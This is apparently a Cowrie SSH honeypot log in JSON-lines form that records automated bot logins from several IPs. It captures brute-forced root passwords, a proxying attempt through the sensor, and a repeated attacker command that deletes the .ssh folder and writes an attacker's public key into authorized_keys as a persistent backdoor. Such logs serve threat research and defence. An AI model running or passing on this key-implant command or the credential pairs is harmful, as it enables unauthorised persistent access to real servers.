{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-26T18:14:37.002138Z","src_ip":"194.164.107.6","session":"8206c8612c7d"}
{"eventid":"cowrie.session.closed","duration":0.17008709907531738,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:14:37.168168Z","src_ip":"194.164.107.6","session":"8206c8612c7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58168,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8293b1b9ac6","protocol":"ssh","message":"New connection: 212.227.235.229:58168 (1.2.3.4:22) [session: e8293b1b9ac6]","sensor":"my-vps","timestamp":"2025-08-26T18:15:02.209106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:15:02.210047Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:15:02.444840Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456789.","message":"login attempt [root/a123456789.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:15:03.423217Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:15:03.982614Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:15:03.983615Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:15:03.984843Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:15:04.222253Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:15:04.756239Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:15:04.756930Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:15:04.993350Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:15:04.994270Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44794,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e6d1344a094","protocol":"ssh","message":"New connection: 212.227.235.229:44794 (1.2.3.4:22) [session: 4e6d1344a094]","sensor":"my-vps","timestamp":"2025-08-26T18:15:09.306524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:15:09.307396Z","src_ip":"212.227.235.229","session":"4e6d1344a094"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:15:09.541561Z","src_ip":"212.227.235.229","session":"4e6d1344a094"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:15:10.520747Z","src_ip":"212.227.235.229","session":"4e6d1344a094"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:15:11.757220Z","src_ip":"212.227.235.229","session":"4e6d1344a094"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44808,"dst_ip":"1.2.3.4","dst_port":22,"session":"b81bc00e749a","protocol":"ssh","message":"New connection: 212.227.235.229:44808 (1.2.3.4:22) [session: b81bc00e749a]","sensor":"my-vps","timestamp":"2025-08-26T18:15:11.991082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:15:11.991747Z","src_ip":"212.227.235.229","session":"b81bc00e749a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:15:12.226018Z","src_ip":"212.227.235.229","session":"b81bc00e749a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:15:13.203572Z","src_ip":"212.227.235.229","session":"b81bc00e749a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:15:13.441324Z","src_ip":"212.227.235.229","session":"b81bc00e749a"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:15:13.442418Z","src_ip":"212.227.235.229","session":"e8293b1b9ac6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28195,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6f9064fdb11","protocol":"ssh","message":"New connection: 213.209.150.239:28195 (1.2.3.4:22) [session: f6f9064fdb11]","sensor":"my-vps","timestamp":"2025-08-26T18:15:16.230849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:15:16.231684Z","src_ip":"213.209.150.239","session":"f6f9064fdb11"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T18:15:16.288364Z","src_ip":"213.209.150.239","session":"f6f9064fdb11"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:15:16.570329Z","src_ip":"213.209.150.239","session":"f6f9064fdb11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":2553,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:2553","sensor":"my-vps","timestamp":"2025-08-26T18:15:16.627724Z","session":"f6f9064fdb11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T18:15:16.684550Z","src_ip":"213.209.150.239","session":"f6f9064fdb11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":31155,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:31155","sensor":"my-vps","timestamp":"2025-08-26T18:15:16.839147Z","session":"f6f9064fdb11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T18:15:16.895989Z","src_ip":"213.209.150.239","session":"f6f9064fdb11"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:15:16.953362Z","src_ip":"213.209.150.239","session":"f6f9064fdb11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41686,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8dc67b9318a","protocol":"ssh","message":"New connection: 212.227.235.229:41686 (1.2.3.4:22) [session: c8dc67b9318a]","sensor":"my-vps","timestamp":"2025-08-26T18:15:34.243406Z"}
{"eventid":"cowrie.client.version","version":"\u0000\u0000\u0004T","message":"Remote SSH version: \u0000\u0000\u0004T","sensor":"my-vps","timestamp":"2025-08-26T18:15:34.278779Z","src_ip":"212.227.235.229","session":"c8dc67b9318a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:15:34.280017Z","src_ip":"212.227.235.229","session":"c8dc67b9318a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48498,"dst_ip":"1.2.3.4","dst_port":22,"session":"6129be580a7c","protocol":"ssh","message":"New connection: 212.227.235.229:48498 (1.2.3.4:22) [session: 6129be580a7c]","sensor":"my-vps","timestamp":"2025-08-26T18:17:02.639381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:17:02.641002Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:17:02.876539Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.login.success","username":"root","password":"Wd123456","message":"login attempt [root/Wd123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:17:03.860595Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:04.353718Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:17:04.354602Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:17:04.355833Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:04.591953Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:17:05.196616Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:17:05.197361Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:17:05.434576Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:05.435497Z","src_ip":"212.227.235.229","session":"6129be580a7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48502,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfa3411ee86e","protocol":"ssh","message":"New connection: 212.227.235.229:48502 (1.2.3.4:22) [session: dfa3411ee86e]","sensor":"my-vps","timestamp":"2025-08-26T18:17:09.760303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:17:09.761252Z","src_ip":"212.227.235.229","session":"dfa3411ee86e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:17:09.998716Z","src_ip":"212.227.235.229","session":"dfa3411ee86e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:17:10.987149Z","src_ip":"212.227.235.229","session":"dfa3411ee86e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:17:12.226963Z","src_ip":"212.227.235.229","session":"dfa3411ee86e"}
